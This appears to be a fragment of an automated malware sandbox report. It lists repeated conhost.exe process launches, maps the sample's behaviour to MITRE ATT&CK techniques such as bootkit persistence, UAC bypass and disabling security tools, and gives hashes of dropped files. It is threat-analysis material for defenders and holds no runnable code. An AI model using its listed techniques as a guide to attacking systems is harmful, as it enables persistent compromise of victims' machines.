C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1660318188205409563917107265551290382748-1751098603-1822731588-2141085578-2125470509"1⤵PID:928
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "459763395-115441340740937333226652851155385439-718664817-2015671780-633350418"1⤵PID:212
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1106646102-1670612167-786876655262543663831590567-276139311-1962143090-51290735"1⤵PID:1636
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1323663577-2126528771-1224594533-1909120194-245589102-608743709214056151517020531"1⤵PID:448
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "11839846542844666551214342381263873509-786782601562913906-1675963772-2004747562"1⤵PID:1692
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1407826741-888069450-314117824-23574163962111348720413210631904639200-1171985879"1⤵PID:3068
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "265251256-772312741130515919440338649-1824397052-854057316260252913355857991"1⤵PID:2864
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-16214321811488666600-460185253-1990130386-357890847-373117358-2119256647-1986565009"1⤵PID:2160
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1648394948695556756-119067024711903741841569503957-2326558741944328670-1507310695"1⤵PID:984
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-15015621446408154401771214791971486014-1889287820-50743135-6793094361773602739"1⤵PID:316
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "808137113230534510599287551362658786-332545449-245427610431244504900540658"1⤵PID:1488
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "409910929951534061940505409-1569581602115073513620340389-18819870931953203640"1⤵PID:2776
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1441706667-16472474101414706321369706027-2249000781802372193-1970997272-1647672068"1⤵PID:2596
Network
MITRE ATT&CK Enterprise v15
Persistence
Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Image File Execution Options Injection
1Pre-OS Boot
1Bootkit
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Image File Execution Options Injection
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Direct Volume Access
1File and Directory Permissions Modification
2Windows File and Directory Permissions Modification
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
2File Deletion
2Modify Registry
3Pre-OS Boot
1Bootkit
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.8MB
MD53900f7cb45a5720e856190b903e6f300
SHA19697bf534890f51723907856be5c74ce4f628454
SHA256441f91ddf843de9ee590a76163c661f83c47d176938b21991ae9db9a75325e5a
SHA5123ca10bf6335337acc147b2a7aecd316f9512aa6fc0dd6327c3ba119f3ce8c6586795fd099b91c3b4aee961452ad7e08e73edaae0f9f4dafad666be4fb4259cc3
-
Filesize
8.0MB
MD527e896886340358645e604a4d523d100
SHA13c7f1c8ab4bccf63ec94302f05b83893f57eb1d0
SHA2567f3bc9ea32ee2069e27a029d1d0f00530e71ed9cdd9606136f23ab5eeb26fbd6
SHA512927b3db4ed62fc0256428d2cbf6e51379be6b00233df70b40ef6e735e9c0b3e027b64190440b3c5173aea93fac9721d27fd2ca07d0c4ba5217ba1ae25b89dd44
-
Filesize
360KB
MD5218e18002822b9a3f9fbb5b609f24a03
SHA1b50a0f3a9d2faf51278081a35f131035ad3860b6
SHA256e33aecf0678644129fd44a7711a50ca3e648bd92d2a2d9559145f2d3207e5f4e
SHA512e619f4a104def71c06e52a2a0b8a23dfddafec3cf7d7205217c38fc3a1d474aa8f7e0dc398d6b9b19a6eb272a092d3ae164e4fe763630994b90425ff6fa5480d
-
Filesize
8.0MB
MD5b3338463452d4c6a7905cd43830aaf19
SHA1ae5bbd2efbef7a7c88575d41249f4aad0883af13
SHA25657901f4c356a1053a6a2fd51248ff1fc79133ca95e967141d724f8e155f84fc4
SHA51223a28484152df1dc59bb63bfb96a0efa636faeda4a22ade9fa98a917581f987319dbfabedc96607832ca4c35e4e6243eeda699b6fb89e1a72575478539e6c724
-
Filesize
8.0MB
MD5d5a50cfd9b09cea2221b9165684f8968
SHA13006ed5e55789f7715782a8fb57ea5cdd3c64e85
SHA256845c3f41e7660239a75b387afe8414c615d912f56b0907d656b6c1f0306b554d
SHA5124e18ccd62a49ac49b070ef03f8b2daf262b9d20b63e2f80ddae0e911bf43dbb69a75a5852f87406236b1f093d76c7bf28c9d8260cffa8b6274ba2c447b631af7
-
Filesize
8.0MB
MD5c1aeb1b7e4c8a16aa94b6bc3f5bcfbe6
SHA1358f355fc6804769e72e7472ad827b236dd42137
SHA2567ddae14a1ca5f196c9956041bea1abe4a12b33e1d41edcf793c3ff90fae37f59
SHA512332f1567dc0dfae6288ef535c95191e0abad2ef14c9c3399512e6f0d55dd4c728e9d2892bf36e23f32ab16708773f3c8c439e0109e68bad5cd4d83dea57d2184
-
Filesize
8.0MB
MD5b340c894bb6b8b0df829e3290b890a28
SHA1c15cdce06cdca5a5432513a849b6129ce5a9dee4
SHA256a57207acec48daee1b81e33cf5e028900e78dd7396b80cd60865c910b5d2ede6
SHA512016d7ac9d14a88b889067e2c69ac0cda7412bc4d0e8148bc238440bce89d6e2252f779dbf0ae9d4750802fcfd45936cb8037ecdc10042f5d051945204545f702
-
Filesize
8.0MB
MD5e7020e70d7076429f6e86f1666661b6d
SHA139a349b9d8161c2c1be9cc7c6b29d709135465c8
SHA256fc5d82a054c8df8bb1243cead7bf762f034e8c0d63a94876f4584710cc2b9748
SHA512b2ab9084d2f8e549e3e1c124fbc0aedfd35c6fad2672dd87100e660e6047aaeb2ec9d77542b786ca86988d1aceac0b3e5d735c2a9b4a2fed71f513a232704494
-
Filesize
8.0MB
MD5930e5afb18586a084cbaf710122d1b08
SHA1765684823003a3e75a8e73dd2089c18bb7ce256f
SHA256aad461b7b2db24c1449cce475bda20c0698d4cda855eb229f1a1e816e18c5af3
SHA5127d04eac6afb36b535f290e2be89607aeb7f5e41e32137347bd10598ce3d9160c01dd430cf1703151e060a2c2b58e6bf24f6f316e80595d4cbedd3f39122400d3
-
Filesize
420KB
MD51910d3503a74274db73b107540f9da5e
SHA1f2d907a7121e5cc21bacf24187f7fed7113d94e6
SHA256d7bb323a8416ebb44bbc74e0b3ea4b17bf788ec39d2f57b850b657a356fc0b73
SHA512da2efe0debc27871cda851380d5287ab7434ba486a532af5e90dcc7950b7cec24430de757c98ed8d7ba6850bd6ebc870d5dbdc2ac8e47d4808fda5e56ae41d28
-
Filesize
60KB
MD5422d954e544f8023c83b70ad479bb093
SHA1a73a997477c45fd9f7bea39bcffaf997a282276b
SHA2563d3b5eba79d784945866d18b04827c61ba5268a4e6cce1776e4c3d4140e1d67a
SHA512cd3f8056b71f63c84f3b0a9e68a5af36444fff30307797af5bebe9f934c0bee63407d87f75d97ac214e372d7aac993b948d4174bb8da49366dae80f68943e6ba
-
Filesize
2.3MB
MD5b2672bb8f1bc96861d4763544eadc5fd
SHA1f09c96e01977e12e76b808d2322e1daa7d17d361
SHA25663d5e27d3e2c92a561155c9709d8a83f7fd8f37fb8d3c9eba17405f7979f1554
SHA51216c9c3dbfd11d71c24f1fb3adef121caf8df7ddfb7310befd0404d940abecb9665f00b4aee7764929b4a770ffec4abffd8cc41e3c8620c116f0d9f23027463cc
-
Filesize
4.3MB
MD5c0518cef4fca5b87c5eb5bbd8014557c
SHA100737eb62d3702142f6b614b5413be4dc950d950
SHA256277fcb370cdd6c8b853aac0e3a32bb0ee4272ddc14baafd76a973740aa10981f
SHA5124097229d7d2d5844cb2b4ac316ac395abff31fc2ad19e3c0650e41347d37ca178cd07a4f0a9d44f7c2aa1edb22119b90a82e5be5c7ebe75c3c3db3178e0daf86
-
Filesize
881KB
MD538758b6434bb96639f79be463440073f
SHA1c55a5de9b002f4d54f2e948751f3c925e30c7082
SHA2560a7063f017eba4096a714527e40f97dcce50e7ec0c8da28435b8f80663074dc6
SHA5124ec0bef43c01846693cdf131560f2dd103aeb89a27770993bbe096c39441db9ad8e325e92ddd1bb079f2bd0e93ab07d6041b050eeeb2141f134b21a5e551c3b7
-
Filesize
1.3MB
MD5b5f78ab86d4e7e2d3e9f5d4701e66381
SHA13ff1401470befdbc0635d3848ba9f16f94012319
SHA2564f0a5e31cea074f5ebbd902a665f3effa5e908aafa551c3fc1599cc2bf641389
SHA512b71979c9ae0462d2f78ec3ec9d53e8901e6396c651581ae5c3dcf64d29ecdfaec46ca7caa1fe4dd5863b29b57795fda178bf73e5da433b6e5f3a36def638d558
-
Filesize
307KB
MD5f1a9b4b1f750bb90b7240f38aa3fd939
SHA14d630bd6b89f4ba0315ed37035d5e32775a7b969
SHA2567cc9be747a138d8b9e716ee5f16188215b730af91d9fe954d8e172f515f5b498
SHA512e4d6eea0e415d27f39224af29cef84bd55fb098b06c7aaee38d6eac34621ca3585bbae0d2fc2938bbe5755fd6d3bbbf47f9c4bc29a6e6914f761c1c76e4a107f
-
Filesize
4KB
MD57df14f970f590c0b23bb134d888278bc
SHA12ee7658c0066f70f196ffd38683a0e948f128ace
SHA256f578d34366cc6c7ed83aa3da2d4e086348ef87c7f6584180a2db0a07cf417c1e
SHA512c1ea6e6f4be80c8fd9745bdc99022b4966ed74487cb11a3f10d4c4f9c5cf711062a2470f192e0a2e73b653497bfaee75f74ecbcbf97e6f3e205a61d45ea975fc
-
Filesize
57KB
MD5cf45949cdbb39c953331cdcb9cec20f8
SHA16756f752141602424af234433dadedc12520165d
SHA25634df739526c114bb89470b3b650946cbf7335cb4a2206489534fb05c1fc143a8
SHA512b699b406bb4df8c6fb6339219ab1feaa5c7b2c39082d3761689e9b5326e52861bb8e2770d683838b05e649ff2022f413dc1e3f7e605a03077190f8950f9442be